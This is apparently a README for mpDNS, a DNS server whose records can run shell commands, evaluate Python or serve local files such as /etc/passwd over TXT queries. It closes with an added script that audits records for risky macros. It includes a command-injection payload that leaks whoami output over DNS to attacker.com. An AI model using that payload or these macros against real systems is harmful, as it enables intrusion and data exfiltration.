mpDNS aka multi-purpose DNS server is a simple, configurable “clone & run” DNS server with multiple useful features.
{{shellexec::dig google.com +short}} -> Execute shell command and respond with result
{{eval::res = '1.1.1.%d' % random.randint(0,255)}} -> Evaluate your Python code
{{file::/etc/passwd}} -> Respond with local file contents
{{resolve}} -> Forward DNS request to local system DNS
{{resolve::example.com}} -> Resolve example.com instead of original record
{{echo}} -> Respond with peer address
{{shellexec::echo %PEER% %QUERY%}} -> Use of variables
A, CNAME, TXT
names.db records without restart/reload with ./mpdns.py -e
Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
Usage: ./mpdns.py
./mpdns.py -e no restart required
Offensive and Defensive purposes
/ping.php?ip=$(dig $(whoami).attacker.com))
TXT query
git clone https://github.com/nopernik/mpDNS
TXT records which are split into chunks of 256 bytes until response reaches maximum allowed 65200b
TXT record with macro {{file::localfile.txt}} is limited to 65200 bytes.
test.*.example.com
{{resolve::example.com}} macro
TTL always set to 0
names.db example:
>>Empty configuration will result in empty but valid responses
>>Unicode domain names are not supported but can still be caught by the server.
>>For example, мама-сервер-unicode.google.com will be caught, but with a SERVFAIL response
passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
shellexec TXT {{shellexec::whoami}}
eval TXT {{eval::import random; res = random.randint(1,500)}}
resolve1 A {{resolve}}
resolve2 A {{resolve::self}} #same as previous
resolve3 A {{resolve::example.com}}
blabla.com A 5.5.5.5
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME c3.example.com
c3.example.com CNAME google.example.com
google.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
notgoogle.com A {{resolve::google.com}}
Example output with names.db example:
Regular resolution from DB: dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com. 0 IN A 8.8.8.8
mpDNS output: – Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)
Recursive CNAME resolution: dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com. IN A
;; ANSWER SECTION:
c1.example.com. 0 IN CNAME c2.example.com.
c2.example.com. 0 IN CNAME c3.example.com.
c3.example.com. 0 IN CNAME google.example.com.
google.example.com. 0 IN CNAME google.com.
google.com. 0 IN A 216.58.206.14
mpDNS output:
>> Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
>> Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)
Wildcard resolution: dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com. 0 IN A 127.0.0.1
mpDNS output: – Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)
Wildcard subdomain resolution: dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com. 0 IN A 7.7.7.7
mpDNS output: – Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)
Forward request macro: dig google.com @localhost
;; ANSWER SECTION:
google.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)
Forward request of custom domain macro: dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com. 0 IN A 172.217.22.110
mpDNS output: – Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)
File contents macro via TXT query: dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com. 0 IN TXT "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:……stripped"
mpDNS output: – Request from 127.0.0.1:38805 -> passwd.example.com. -> 'root:x:0:0:root…(2808)'
Custom python code macro via TXT query: dig txt eval @localhost
;; ANSWER SECTION:
eval. 0 IN TXT "320"
mpDNS output: – Request from 127.0.0.1:33821 -> eval. -> '320'
Shell command macro via TXT query: dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec. 0 IN TXT "root"
mpDNS output: – Request from 127.0.0.1:50262 -> shellexec. -> 'root'
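An added example, not part of mpDNS or the original post: a small Python model of the names.db format that reproduces the lookup results shown above and flags records whose macros run shell or Python code, read local files, or pass client-supplied %PEER%/%QUERY% values into them, which is worth reviewing before exposing a lab instance to other hosts. The precedence (exact name, then `*.suffix`, then `*`), the comment handling and all function names are assumptions inferred from the example output, not taken from the mpDNS source.

```python
import re

# Constructed sample: shortened from the names.db example on this page.
NAMES_DB = """\
passwd.example.com TXT {{file::/etc/passwd}} #comments are ignored
log TXT {{shellexec::echo %PEER% %QUERY%}}
* A 127.0.0.1
*.example.com A 7.7.7.7
c1.example.com CNAME c2.example.com
c2.example.com CNAME google.com
test.example.com A 8.8.8.8
google.com A {{resolve::self}}
"""
MACRO = re.compile(r"\{\{(\w+)(?:::(.*))?\}\}")
RISKY = {"shellexec", "eval", "file"}  # run code or read local files per query

def parse(text):
    """Return [(name, rtype, value)]; assumes '#' after whitespace starts a comment."""
    rows = [re.split(r"(?:^|\s)#", ln, maxsplit=1)[0].split(None, 2) for ln in text.splitlines()]
    return [(r[0].lower().rstrip("."), r[1].upper(), r[2].strip()) for r in rows if len(r) == 3]

def lookup(records, qname, qtype):
    """Assumed precedence (matches the outputs above): exact, *.suffix, bare *."""
    def rank(n):
        exact, sub = n == qname, n.startswith("*.") and qname.endswith(n[1:])
        return 0 if exact else 1 if sub else 2 if n == "*" else None
    hits = [(rank(n), v) for n, t, v in records if t == qtype and rank(n) is not None]
    return min(hits)[1] if hits else None

def resolve(records, qname, qtype="A", max_hops=8):
    """Follow exact-name CNAMEs (bounded against loops), then look up qtype."""
    qname, chain = qname.lower().rstrip("."), []
    while len(chain) < max_hops:
        target = next((v for n, t, v in records if t == "CNAME" and n == qname), None)
        if target is None:
            break
        chain.append(target)
        qname = target.lower().rstrip(".")
    return chain, lookup(records, qname, qtype)

def audit(records):
    """Flag macros that run code or read files; note client-controlled input."""
    out = []
    for name, _, value in records:
        m = MACRO.search(value)
        if m and m.group(1) in RISKY:
            tainted = any(v in (m.group(2) or "") for v in ("%PEER%", "%QUERY%"))
            out.append((name, m.group(1), "client-input" if tainted else "static"))
    return out
```

Macros are returned unexpanded, so `resolve` can be run against an untrusted names.db without executing anything in it.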